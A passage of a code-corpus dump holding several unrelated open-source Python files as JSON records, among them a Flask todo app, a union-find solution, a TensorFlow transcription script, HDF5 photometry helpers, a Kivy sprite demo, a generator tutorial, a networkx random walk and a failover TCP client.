crImgName.replace('_MS_CRnR.img', '_MS_smoothed5_CR.hdr')\n envi.save_image(outFileName, crCube_smoothed, dtype=np.float32, force=True,\n interleave='bil', metadata=header)\n \"\"\"\n\n","sub_path":"hsiUtilities/hsiUtilities.py","file_name":"hsiUtilities.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
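scaleSpectra in the record above pins every spectrum's deepest absorption to a common depth: after shifting by 1, dividing by the row minimum, and multiplying by -scaleMin, each row's minimum lands exactly at 1 - scaleMin. A vectorized numpy check with toy spectra (the loop version above gives the same result):

    import numpy as np

    data = 1.0 - np.random.rand(3, 5) * 0.3  # toy spectra with values just below 1
    shifted = data - 1.0
    scaled = (shifted / shifted.min(axis=1, keepdims=True)) * -0.02 + 1.0
    print(scaled.min(axis=1))  # every row: 0.98, i.e. 1 - scaleMin for the default 0.02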
+{"seq_id":"88357668","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nfrom augmentation import *\nimport matplotlib.pyplot as plt\n\ndata_folder = \"../data\"\n\n\ntransform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0, 0, 0), (1, 1, 1))])\n\ntrain_set = torchvision.datasets.MNIST(root=data_folder, train=True,\n download=False, transform=transform)\n\ntrain_loader = torch.utils.data.DataLoader(train_set, batch_size=1,\n shuffle=True, num_workers=0)\n\n\niterTrainLoader = iter(train_loader)\ninput1, _ = next(iterTrainLoader)\ninput1Aug = random_augmentation(input1)\nprint(input1.shape)\nprint(input1Aug.shape)\n\nf, imgplot = plt.subplots(1,2)\nimgplot[0].imshow(torch.squeeze(input1), cmap='gray')\nimgplot[1].imshow(torch.squeeze(input1Aug), cmap='gray')\nplt.show()\n","sub_path":"LearnDistance/fix_one/testAugmentations.py","file_name":"testAugmentations.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"441294671","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom flask import Flask, render_template, url_for, request, redirect\nfrom pymongo import MongoClient\nfrom redis import Redis\n\nr = Redis(host='redis', port=6379)\napp = Flask(__name__)\n\nm = MongoClient('mongo', 27017)\ndb = m.tododb\n\n@app.route('/')\ndef todo():\n _items = db.tododb.find()\n items = [item for item in _items]\n return render_template('todo.html', items=items)\n\n\n@app.route('/new', methods=['POST'])\ndef new():\n item_doc = {\n 'name': request.form['name'],\n 'description': request.form['description']\n }\n db.tododb.insert_one(item_doc)\n return redirect(url_for('todo'))\n\n\n@app.route('/redis')\ndef hello():\n r.incr('hits')\n return 'I have been seen %s times' % r.get('hits')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","sub_path":"flask_compose/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"116335293","text":"class UnionFind:\n def __init__(self, n: int):\n self.count = n\n self.id = list(range(n))\n self.rank = [0] * n\n\n def unionByRank(self, u: int, v: int) -> None:\n i = self._find(u)\n j = self._find(v)\n if i == j:\n return\n if self.rank[i] < self.rank[j]:\n self.id[i] = j\n elif self.rank[i] > self.rank[j]:\n self.id[j] = i\n else:\n self.id[i] = j\n self.rank[j] += 1\n self.count -= 1\n\n def _find(self, u: int) -> int:\n if self.id[u] != u:\n self.id[u] = self._find(self.id[u])\n return self.id[u]\n\n\nclass Solution:\n def countComponents(self, n: int, edges: List[List[int]]) -> int:\n uf = UnionFind(n)\n\n for u, v in edges:\n uf.unionByRank(u, v)\n\n return uf.count\n","sub_path":"solutions/0323. Number of Connected Components in an Undirected Graph/0323-3.py","file_name":"0323-3.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"388438103","text":"\"\"\"Transcribe a given audio file.\"\"\"\n\nimport os\n\nimport tensorflow as tf\n\nfrom python.params import FLAGS, TF_FLOAT, BASE_PATH\nfrom python.load_sample import load_sample, NUM_FEATURES\n# WarpCTC crashes during evaluation. Even if it's only imported and not actually being used.\nif FLAGS.use_warp_ctc:\n FLAGS.use_warp_ctc = False\n import python.model as model\nelse:\n import python.model as model\n\n\n# File to transcribe.\n# WAV_PATHS = ['../datasets/speech_data/timit/TIMIT/TRAIN/DR4/FALR0/SA1.WAV']\nWAV_PATHS = [os.path.join(BASE_PATH, '../datasets/myaudiocorpus/idontunderstandawordyoujustsaid.wav')]\n\n\ndef transcribe_once(logits_op, decoded_op, plaintext_op, feed_dict):\n \"\"\"Restore model from latest checkpoint and run the inference for the provided `sequence`.\n\n Args:\n logits_op (tf.Tensor):\n Logits operator.\n decoded_op (tf.Tensor):\n Decoded operator.\n plaintext_op (tf.Tensor):\n Plaintext operator.\n feed_dict (dict):\n Session run feed dictionary.\n\n Returns:\n Nothing.\n \"\"\"\n # Session configuration.\n session_config = tf.ConfigProto(\n log_device_placement=False,\n gpu_options=tf.GPUOptions(allow_growth=True)\n )\n\n with tf.Session(config=session_config) as sess:\n checkpoint = tf.train.get_checkpoint_state(FLAGS.train_dir)\n if checkpoint and checkpoint.model_checkpoint_path:\n saver = tf.train.Saver()\n\n # Restore from checkpoint.\n saver.restore(sess, checkpoint.model_checkpoint_path)\n # Extract global stop from checkpoint.\n global_step = checkpoint.model_checkpoint_path.split('/')[-1].split('-')[-1]\n global_step = str(global_step)\n print('Loaded global step: {}, from checkpoint: {}'\n .format(global_step, FLAGS.train_dir))\n else:\n print('No checkpoint file found.')\n return\n\n # Start the queue runners.\n coord = tf.train.Coordinator()\n threads = []\n try:\n for qr in tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS):\n threads.extend(qr.create_threads(sess, coord=coord, daemon=True, start=True))\n\n if not coord.should_stop():\n logits, decoded, plaintext = sess.run([logits_op, decoded_op, plaintext_op],\n feed_dict=feed_dict)\n\n print('Transcriptions {}:\\n{}'.format(plaintext.shape, plaintext))\n\n except Exception as e:\n print('EXCEPTION:', e, ', type:', type(e))\n coord.request_stop(e)\n\n coord.request_stop()\n coord.join(threads, stop_grace_period_secs=120)\n\n\ndef transcribe(wav_file):\n \"\"\"Load an audio file and prepare the TensorFlow graph for inference.\n\n Args:\n wav_file (str): Path to WAV file.\n\n Returns:\n Nothing.\n \"\"\"\n assert os.path.isfile(wav_file)\n\n with tf.Graph().as_default():\n # Get evaluation sequences and ground truth.\n with tf.device('/cpu:0'):\n # Load audio file into tensor.\n sequence, seq_length = load_sample(wav_file)\n\n sequence = [sequence] * FLAGS.batch_size\n sequence_ph = tf.placeholder(dtype=TF_FLOAT,\n shape=[FLAGS.batch_size, None, NUM_FEATURES])\n\n seq_length = [seq_length] * FLAGS.batch_size\n seq_length_ph = tf.placeholder(dtype=tf.int32, shape=[FLAGS.batch_size, ])\n\n feed_dict = {\n sequence_ph: sequence,\n seq_length_ph: seq_length\n }\n\n # Build a graph that computes the logits predictions from the inference model.\n logits_op, seq_length = model.inference(sequence_ph, seq_length_ph, training=False)\n\n decoded_op, plaintext_op, _ = model.decode(logits_op, seq_length, originals=None)\n\n transcribe_once(logits_op, decoded_op, plaintext_op, feed_dict)\n\n\n# noinspection PyUnusedLocal\ndef main(argv=None):\n \"\"\"TensorFlow starting 
routine.\"\"\"\n for wav_path in WAV_PATHS:\n transcribe(wav_path)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"435578210","text":"import os\nimport h5py\nimport numpy as np\n\ndef write_phot_hd5(setup, dataset_phot_data, log=None,\n filename=None):\n \"\"\"Function to output a dataset photometry table to an HD5 file\"\"\"\n\n if not filename:\n output_path = os.path.join(setup.red_dir,'photometry.hdf5')\n else:\n output_path = os.path.join(setup.red_dir,filename)\n\n with h5py.File(output_path, \"w\") as f:\n dset = f.create_dataset('dataset_photometry',\n dataset_phot_data.shape,\n dtype='float64',\n data=dataset_phot_data)\n f.close()\n\n if log:\n log.info('Output photometry dataset for '+str(setup.red_dir)+\\\n ' with '+repr(dataset_phot_data.shape)+\\\n ' datapoints')\n\ndef read_phot_hd5(setup,log=None, filename=None, return_type='hdf5'):\n \"\"\"Function to read an existing dataset photometry table in HD5 format\n Function returns two zero-length arrays if none is available\"\"\"\n\n if not filename:\n input_path = os.path.join(setup.red_dir,'photometry.hdf5')\n else:\n input_path = os.path.join(setup.red_dir,filename)\n\n if os.path.isfile(input_path):\n f = h5py.File(input_path, \"r\")\n dset = f['dataset_photometry']\n\n if log:\n log.info('Loaded photometry data with '+repr(dset.shape)+\\\n ' datapoints')\n\n if return_type == 'hdf5':\n return dset\n else:\n return np.array(dset[:])\n else:\n if log:\n log.info('No existing photometry available to load')\n\n return np.array([])\n\n\ndef read_phot_from_hd5_file(file_path, return_type='hdf5'):\n \"\"\"Function to read an existing dataset photometry table in HD5 format\n Function returns two zero-length arrays if none is available\"\"\"\n\n if not os.path.isfile(file_path):\n raise IOError('Cannot find input photometry file '+file_path)\n\n f = h5py.File(file_path, \"r\")\n dset = f['dataset_photometry']\n\n if return_type == 'hdf5':\n return dset\n else:\n return np.array(dset[:])\n\ndef read_star_from_hd5_file(file_path, quad_idx):\n \"\"\"Function to read an existing dataset photometry table in HD5 format\n Function returns two zero-length arrays if none is available\"\"\"\n\n dset = read_phot_from_hd5_file(file_path, return_type='hdf5')\n\n return np.array(dset[quad_idx,:,:])\n\ndef load_four_quadrant_photometry(red_dir, file_rootname, verbose=False):\n \"\"\"Function to read the timeseries photometry from all four quadrants\"\"\"\n\n for q in range(1,5,1):\n file_path = os.path.join(red_dir, file_rootname+'_quad'+str(q)+'_photometry.hdf5')\n quad_data = read_phot_from_hd5_file(file_path, return_type='array')\n if q == 1:\n phot_data = quad_data\n else:\n phot_data = np.concatenate((phot_data, quad_data))\n if verbose: print('Read in photometry for quadrant '+str(q))\n\n if verbose: print('Completed read of timeseries photometry: '+repr(phot_data.shape))\n\n return phot_data\n\ndef mask_phot_array(phot_data, col, err_col, qc_col=None):\n \"\"\"Function to create a Numpy masked array based on the results of selecting\n valid photometric entries from a standard-format photometry array.\"\"\"\n\n # Select valid data. 
Invalid photometry measurements are usually set to\n # -99.0\n selection = np.logical_and(phot_data[:,:,col] > 0.0,\n phot_data[:,:,err_col] > 0.0)\n if qc_col != None:\n selection = np.logical_and(phot_data[:,:,qc_col] == 0.0, selection)\n\n mask = np.invert(selection)\n\n expand_mask = np.empty((mask.shape[0], mask.shape[1], phot_data.shape[2]))\n for col in range(0,expand_mask.shape[2],1):\n expand_mask[:,:,col] = mask\n\n phot_data = np.ma.masked_array(phot_data, mask=expand_mask)\n\n return phot_data\n\ndef unmask_phot_array(phot_data):\n \"\"\"Function to unmask a masked photometry array. Convienence wrapper\n for np.ma function to match the syntax used for the masking function\"\"\"\n return np.ma.getdata(phot_data)\n\ndef write_normalizations_hd5(red_dir, file_prefix, normalizations):\n \"\"\"Function to output a per-star, per-dataset normalization coefficients\n tables to an HD5 file.\n\n The structure of the tables output have the columns:\n field_id, delta_mag_, delta_mag_error_, delta_mag_, ...\n where the datasets are listed in the same order as the datasets table\n in the CrossMatchTable.\n \"\"\"\n\n output_path = os.path.join(red_dir,\n file_prefix+'_star_dataset_normalizations.hdf5')\n\n column_names = []\n with h5py.File(output_path, \"w\") as f:\n for dset_code, table in normalizations.items():\n data = np.zeros((len(table),len(table.colnames)))\n for c,cname in enumerate(table.colnames):\n data[:,c] = table[cname]\n if len(column_names) == 0:\n column_names = table.colnames\n dset = f.create_dataset(dset_code,\n data.shape,\n dtype='float64',\n data=data)\n f.close()\n","sub_path":"pyDANDIA/hd5_utils.py","file_name":"hd5_utils.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"406213098","text":"\"\"\"kvcheetah - Testing Framework\"\"\"\n\nfrom math import cos, radians, sin\nimport os\nfrom random import randint, random\n\nfrom kivy.app import App, Builder\nfrom kivy.clock import Clock\nfrom kivy.core.audio import SoundLoader\nfrom kivy.factory import Factory\nfrom kivy.uix.screenmanager import Screen, ScreenManager, SlideTransition\n\nfrom kvcheetah import __file__, __version__\nfrom kvcheetah.graphics.sprite import Sprite\nfrom kvcheetah.graphics.tilemap import TileMap\n\n#Ensure that the current working directory is the package directory\nos.chdir(os.path.dirname(__file__))\n\n\n#Globals\n#==============================================================================\nKVLANG = \"\"\"\n:\n demo_area: DemoArea\n\n BoxLayout:\n orientation: \"vertical\"\n\n Button:\n text: \"Menu\"\n size_hint_y: .1\n on_release: self.parent.parent.menu()\n\n StencilView:\n id: DemoArea\n\n\n:\n pos_lbl: PosLabel\n joystick: Joystick\n\n Label:\n id: PosLabel\n text: \"Joystick Pos: (0, 0)\"\n center: self.center\n\n VirtualJoystick:\n id: Joystick\n size_hint: (None, None)\n pos: (50, 50)\n size: (100, 100)\n\n\n:\n Screen:\n name: \"Menu\"\n\n BoxLayout:\n orientation: \"vertical\"\n\n Label:\n text: \"Choose a demo below:\"\n size_hint_y: .1\n\n ScrollView:\n BoxLayout:\n orientation: \"vertical\"\n\n Button:\n text: \"Sprite Demo\"\n on_release: root.switch_screen(\"SpriteDemo\")\n\n Button:\n text: \"Sprite Color Demo\"\n on_release: root.switch_screen(\"SpriteColorDemo\")\n\n Button:\n text: \"TileMap Demo\"\n on_release: root.switch_screen(\"TileMapDemo\")\n\n Button:\n text: \"Joystick Demo\"\n on_release: root.switch_screen(\"JoystickDemo\")\n\n SpriteDemo:\n name: \"SpriteDemo\"\n\n SpriteColorDemo:\n name: \"SpriteColorDemo\"\n\n TileMapDemo:\n name: \"TileMapDemo\"\n\n JoystickDemo:\n name: \"JoystickDemo\"\n\"\"\"\nPOP_SND = SoundLoader.load(\"data/sfx/bubble-pop.wav\")\n\n\n#Classes\n#==============================================================================\nclass Bubble(Sprite):\n \"\"\"Base class for a bubble.\"\"\"\n def __init__(self, **kwargs):\n \"\"\"Setup this bubble.\"\"\"\n super(Bubble, self).__init__(**kwargs)\n self.pos = (\n randint(32, int(self.parent.width) - 32),\n randint(32, int(self.parent.height) - 32)\n )\n self.size = (64, 64)\n self.origin = (32, 32)\n self.source = \"atlas://data/images/sprites/bubble\"\n self.velocity = (\n 2 * cos(radians(randint(0, 359))),\n 2 * sin(radians(randint(0, 359)))\n )\n self._hp = 10\n self._destroy_cb = None\n\n #Process keyword args\n if \"destroy_cb\" in kwargs:\n self.destroy_cb = kwargs[\"destroy_cb\"]\n\n def get_hp(self):\n \"\"\"Get the HP of this bubble.\"\"\"\n return self._hp\n\n def set_hp(self, value):\n \"\"\"Set the HP of this bubble.\"\"\"\n self._hp = value\n\n if value <= 0:\n try:\n POP_SND.seek(0)\n POP_SND.play()\n\n except Exception:\n pass\n\n self.source = \"atlas://data/images/sprites/bubble-pop\"\n self.velocity = (0, 0)\n Clock.schedule_once(self.destroy, .5)\n\n hp = property(get_hp, set_hp)\n\n def get_destroy_cb(self):\n \"\"\"Get the destroy callback for this bubble.\"\"\"\n return self._destroy_cb\n\n def set_destroy_cb(self, value):\n \"\"\"Set the destroy callback for this bubble.\"\"\"\n self._destroy_cb = value\n\n destroy_cb = property(get_destroy_cb, set_destroy_cb)\n\n def invert_velocity(self):\n \"\"\"Invert the velocity of this bubble.\"\"\"\n vx, vy = self.velocity\n self.velocity = (-vx, -vy)\n\n def destroy(self, t):\n \"\"\"Destroy this 
bubble.\"\"\"\n try:\n self.destroy_cb(self)\n\n except Exception:\n pass\n\n def update(self):\n \"\"\"Update this bubble.\"\"\"\n #Update velocity\n x, y = self.pos\n vx, vy = self.velocity\n\n if x < 32 or x > self.parent.width - 33:\n vx = -vx\n\n if y < 32 or y > self.parent.height - 33:\n vy = -vy\n\n self.velocity = (vx, vy)\n super(Bubble, self).update()\n\n\nclass Pin(Sprite):\n \"\"\"Base class for a pin.\"\"\"\n def __init__(self, **kwargs):\n \"\"\"Setup this pin.\"\"\"\n super(Pin, self).__init__(**kwargs)\n self.size = (10, 64)\n self.origin = (5, 64)\n self.source = \"atlas://data/images/sprites/pin\"\n\n\nclass Egg(Sprite):\n \"\"\"Base class for an egg.\"\"\"\n def __init__(self, **kwargs):\n \"\"\"Setup this egg.\"\"\"\n super(Egg, self).__init__(**kwargs)\n self.size = (48, 64)\n self.origin = (24, 32)\n self.source = \"atlas://data/images/sprites/egg\"\n\n\nclass Ball(Sprite):\n \"\"\"Base class for a ball.\"\"\"\n def __init__(self, **kwargs):\n \"\"\"Setup this ball.\"\"\"\n super(Ball, self).__init__(**kwargs)\n self.pos = (self.parent.width / 2, self.parent.height)\n self.size = (64, 64)\n self.origin = (32, 32)\n self.velocity = (0, -2)\n self.source = \"atlas://data/images/sprites/ball\"\n\n def update(self):\n \"\"\"Update this ball.\"\"\"\n #Update velocity\n vx, vy = self.velocity\n vy -= 1\n \n if vy > 16:\n vy = 16\n\n if self.parent.parent.parent.tilemap.hit(self) > 0:\n vy = -vy\n\n self.velocity = (vx, vy)\n super(Ball, self).update()\n\n\nclass DemoBase(Screen):\n \"\"\"Base class for a demo screen.\"\"\"\n def menu(self):\n \"\"\"Return to the main menu.\"\"\"\n self.parent.switch_screen(\"Menu\")\n\n\nclass SpriteDemo(DemoBase):\n \"\"\"A simple sprite demo.\"\"\"\n def __init__(self, **kwargs):\n \"\"\"Setup this demo.\"\"\"\n super(SpriteDemo, self).__init__(**kwargs)\n self.spawn_tmr = 0\n\n def on_enter(self):\n \"\"\"Handle enter event.\"\"\"\n #Creat the pin\n self.pin = Pin(parent = self.demo_area)\n\n #Init bubble collection\n self.bubbles = []\n\n #Start the demo\n self.frame_event = Clock.schedule_interval(self.update, 1 / 60)\n\n def on_leave(self):\n \"\"\"Handle leave event.\"\"\"\n #Stop the demo\n self.frame_event.cancel()\n\n #Destroy bubbles\n self.bubbles = None\n\n #Destroy pin\n self.pin = None\n\n def on_touch_down(self, touch):\n \"\"\"Handle touch down event.\"\"\"\n super(SpriteDemo, self).on_touch_down(touch)\n self.pin.pos = (touch.x, touch.y)\n self.pin.show(True)\n\n def on_touch_up(self, touch):\n \"\"\"Handle touch up event.\"\"\"\n super(SpriteDemo, self).on_touch_up(touch)\n self.pin.show(False)\n\n def on_touch_move(self, touch):\n \"\"\"Handle touch move event.\"\"\"\n super(SpriteDemo, self).on_touch_move(touch)\n self.pin.pos = (touch.x, touch.y)\n\n def spawn_bubble(self):\n \"\"\"Spawn a new bubble.\"\"\"\n #Update spawn timer\n self.spawn_tmr -= 1\n\n #Spawn a new bubble if the timer has expired and there are less than 10\n #bubbles.\n if self.spawn_tmr <= 0 and len(self.bubbles) < 10:\n self.bubbles.append(Bubble(\n parent = self.demo_area,\n destroy_cb = self.destroy_bubble\n ))\n self.bubbles[-1].show(True)\n self.spawn_tmr = 100\n\n def destroy_bubble(self, bubble):\n \"\"\"Destroy the given bubble.\"\"\"\n self.bubbles.remove(bubble)\n\n def update(self, t):\n \"\"\"Update this demo.\"\"\"\n #Spawn a new bubble\n self.spawn_bubble()\n\n #Update bubbles\n for bubble in self.bubbles:\n #Update bubble\n bubble.update()\n\n #Do collision detection\n if bubble.hit(self.pin):\n bubble.hp = 0\n continue\n\n for 
bubble2 in self.bubbles:\n if bubble2.hp > 0 and bubble.hit(bubble2, \"circle\"):\n bubble.invert_velocity()\n bubble.hp -= 1\n\n\nclass SpriteColorDemo(DemoBase):\n \"\"\"A sprite color demo.\"\"\"\n def __init__(self, **kwargs):\n \"\"\"Setup this demo.\"\"\"\n super(SpriteColorDemo, self).__init__(**kwargs)\n self.color_tmr = 0\n\n def on_enter(self):\n \"\"\"Handle enter event.\"\"\"\n #Create the egg\n self.egg = Egg(parent = self.demo_area)\n self.egg.pos = (self.width / 2, self.height / 2)\n self.egg.show(True)\n\n #Start the demo\n self.frame_event = Clock.schedule_interval(self.update, 1 / 60)\n\n def on_leave(self):\n \"\"\"Handle leave event.\"\"\"\n #Stop the demo\n self.frame_event.cancel()\n\n #Destroy the egg\n self.egg = None\n\n def update(self, t):\n \"\"\"Update this demo.\"\"\"\n #Update color change timer\n self.color_tmr -= 1\n\n #Change the egg color if the timer has expired\n if self.color_tmr <= 0:\n self.egg.color = (\n randint(0, 255) / 255,\n randint(0, 255) / 255,\n randint(0, 255) / 255,\n 1\n )\n self.color_tmr = 30\n\n\nclass TileMapDemo(DemoBase):\n \"\"\"A tilemap demo.\"\"\"\n def on_enter(self):\n \"\"\"Handle enter event.\"\"\"\n #Init tileset and map data\n tileset = [\n \"atlas://data/images/tiles/blank\",\n \"atlas://data/images/tiles/dirt\",\n \"atlas://data/images/tiles/grass\",\n \"atlas://data/images/tiles/dirt-slope1\",\n \"atlas://data/images/tiles/dirt-slope2\",\n \"atlas://data/images/tiles/grass-slope1\",\n \"atlas://data/images/tiles/grass-slope2\",\n \"atlas://data/images/tiles/grass-slope-base1\",\n \"atlas://data/images/tiles/grass-slope-base2\"\n ]\n map_data = [[0 for x in range(128)] for y in range(128)]\n\n #Add dirt tiles\n for y in range(2):\n for x in range(128):\n map_data[y][x] = 1\n\n #Add grass tiles\n for x in range(128):\n map_data[2][x] = 2\n\n #Add a small hill\n map_data[2][29] = 7\n map_data[3][29] = 5\n map_data[2][30] = 1\n map_data[3][30] = 7\n map_data[4][30] = 5\n map_data[2][31] = 1\n map_data[3][31] = 1\n map_data[4][31] = 7\n map_data[5][31] = 5\n\n #Create the tilemap\n self.tilemap = TileMap(\n parent = self.demo_area,\n tileset = tileset,\n map_data = map_data\n )\n self.tilemap.show(True)\n\n #Create a ball\n self.ball = Ball(parent = self.demo_area)\n self.ball.show(True)\n\n #Start the demo\n self.frame_event = Clock.schedule_interval(self.update, 1 / 60)\n\n def on_leave(self):\n \"\"\"Handle leave event.\"\"\"\n #Stop the demo\n self.frame_event.cancel()\n\n #Destroy the ball\n self.ball = None\n\n #Destroy the tilemap\n self.tilemap = None\n\n def update(self, t):\n \"\"\"Update this demo.\"\"\"\n #Scroll the tilemap horizontally\n x, y = self.tilemap.offset\n x += 2\n self.tilemap.offset = (x, y)\n\n #Update the ball\n self.ball.update()\n\n\nclass JoystickDemo(DemoBase):\n \"\"\"A joystick demo.\"\"\"\n def on_enter(self):\n \"\"\"Handle enter event.\"\"\"\n #Start the demo\n self.frame_event = Clock.schedule_interval(self.update, 1 / 60)\n\n def on_leave(self):\n \"\"\"Handle leave event.\"\"\"\n #Stop the demo\n self.frame_event.cancel()\n\n def update(self, t):\n \"\"\"Update this demo.\"\"\"\n self.pos_lbl.text = \"Joystick Pos: {}\".format(self.joystick.joy_pos)\n\n\nclass MainScreen(ScreenManager):\n \"\"\"The main screen of this app.\"\"\"\n def switch_screen(self, name):\n \"\"\"Switch to the given screen.\"\"\"\n if name == \"Menu\":\n self.transition = SlideTransition(direction = \"right\")\n\n else:\n self.transition = SlideTransition(direction = \"left\")\n\n self.current = name\n\n\nclass 
KvCheetahApp(App):\n \"\"\"A basic app class.\"\"\"\n def build(self):\n \"\"\"Build the UI for this app.\"\"\"\n self.title = \"KvCheetah v{}\".format(__version__)\n Builder.load_string(KVLANG)\n return MainScreen()\n\n\n#Register classes\n#==============================================================================\nFactory.register(\"SpriteDemo\", SpriteDemo)\n\n\n#Entry Point\n#==============================================================================\nKvCheetahApp().run()\n","sub_path":"android/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"464163998","text":"#!/usr/bin/python3\n# coding=utf-8\n\n'''\n\n迭代器\n迭代是Python最强大的功能之一,是访问集合元素的一种方式。。\n迭代器是一个可以记住遍历的位置的对象。\n迭代器对象从集合的第一个元素开始访问,直到所有的元素被访问完结束。迭代器只能往前不会后退。\n迭代器有两个基本的方法:iter() 和 next()。\n\n'''\n\n\n# 字符串和数组对象都可以用于创建迭代器对象.\n# 注意 : 迭代器,最开始指向第一个元素前面一个的位置.并不是指向第一个元素\nlist1 = [1,2,3,4,5]\nit = iter(list1) # 创建迭代器对象.\nprint(next(it)) # 输出迭代器的下一个对象\n\n# 使用for遍历\nfor x in it:\n print(x,end= \" \")\n\n# 使用 next\nprint(\"\\n使用 next\")\n# import sys # 引入 sys模块\n# it1 = iter(list1)\n# while True: # 死循环.\n# try:\n# print(next(it1) ,end=\" \") # 打印下一个元素,没有则发生异常.\n# except StopIteration:\n# sys.exit() # 异常退出\n\n\n\n'''\n生成器\n 1. 在 Python 中,使用了 yield 的 函数 被称为生成器(generator)。\n 2. 跟普通函数不同的是,生成器是一个返回迭代器的函数,只能用于迭代操作,更简单点理解生成器就是一个迭代器。\n 3. 在调用生成器运行的过程中,每次遇到 yield 时函数会暂停并保存当前所有的运行信息,\n 4. 返回yield的值。并在下一次执行 next()方法时从当前位置继续运行。\n'''\n\n\n# yield 实现斐波那契数列\n\nprint('\\nyield 实现斐波那契数列')\nimport sys\n\ndef fibonacci(n): # 生成器函数,斐波那契数列\n a,b,counter = 0,1,0\n while True:\n if counter > n:\n return\n yield a # 会返回 a 的值并且保存当前现场信息,等待下次next时继续执行.\n a, b = b, a + b\n counter += 1\n\n\nf = fibonacci(10) # f是一个迭代器\nprint('f 的类型 : ', type(f))\n\n# 遍历.\nfor x in f :\n print(x, end=' ')\nprint('\\n')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Python 3.x/迭代器与生成器.py","file_name":"迭代器与生成器.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"157128119","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 11 10:04:42 2020\r\n\r\n@author: bijuangalees\r\n\"\"\"\r\nimport networkx as nx\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport operator\r\n\r\nG=nx.gnp_random_graph(10,0.5,directed =True)\r\nnx.draw(G)\r\nplt.show\r\n#x is the random source node \r\nx=random.choice([i for i in range(G.number_of_nodes())])\r\ndict_counter={}\r\nfor i in range(G.number_of_nodes()):\r\n dict_counter[i]=0\r\ndict_counter[x]=dict_counter[x]+1\r\nfor i in range(100000):\r\n list_n=list(G.neighbors(x))\r\n if (len(list_n)==0):# if x is a sink\r\n x=random.choice([i for i in range(G.number_of_nodes())])\r\n dict_counter[x]=dict_counter[x]+1\r\n else:\r\n x=random.choice(list_n) #choose a node randomly from\r\n dict_counter[x]=dict_counter[x]+1\r\np=nx.pagerank(G)\r\nsorted_p=sorted(p.items(),key=operator.itemgetter(1))\r\nsorted_rw=sorted(dict_counter.items(),key=operator.itemgetter(1))\r\nprint(dict_counter)\r\n \r\n","sub_path":"pyweek12/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"88410193","text":"from JumpScale import j\nimport JumpScale.baselib.serializers\nimport JumpScale.grid.serverbase\nfrom JumpScale.grid.serverbase.DaemonClient import Transport\nimport time\n\ndef retry(func):\n def wrapper(self, *args, **kwargs):\n try:\n if j.system.net.tcpPortConnectionTest(*self._connection[:2]):\n clientfunc = getattr(self._client, func.__name__)\n return clientfunc(*args, **kwargs)\n except:\n pass # we will execute the reconnect\n self._connection[2] = time.time()\n self.connect(self._id)\n clientfunc = getattr(self._client, func.__name__)\n return clientfunc(*args, **kwargs)\n return wrapper\n\nclass TCPHATransport(Transport):\n def __init__(self, connections, clientclass, timeout=None, *args, **kwargs):\n self._connections = [ [ip, port, 0] for ip, port in connections ]\n self._timeout = timeout\n self._args = args\n self._kwargs = kwargs\n self._clientclass = clientclass\n self._client = None\n self._connection = None\n self._id = None\n\n def connect(self, sessionid):\n if self._client:\n self._client.close()\n for attempt in range(2):\n for connection in sorted(self._connections, key=lambda c: c[-1]):\n try:\n if j.system.net.tcpPortConnectionTest(*connection[:2]):\n self._id = sessionid\n ip, port, timestamp = connection\n args = list(connection[:-1]) + list(self._args)\n client = self._clientclass(*args, **self._kwargs)\n client.connect(sessionid)\n self._connection = connection\n self._client = client\n return\n except Exception as e:\n print((\"Error occured %s\" % e))\n pass # invalidate the client\n if self._client:\n self._client.close()\n connection[2] = time.time()\n ips = [ \"%s:%s\" % (con[0], con[1]) for con in self._connections ]\n msg = \"Failed to connect to %s\" % (\", \".join(ips))\n j.events.opserror_critical(msg)\n\n @retry\n def sendMsg(self, category, cmd, data, sendformat=\"\", returnformat=\"\",timeout=None):\n pass\n\n def close(self):\n if self._client:\n self._client.close()\n\n def __str__(self):\n return \"%s %s\" % (self.__class__.__name__, self._connections)\n","sub_path":"lib/JumpScale/grid/serverbase/TCPHATransport.py","file_name":"TCPHATransport.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
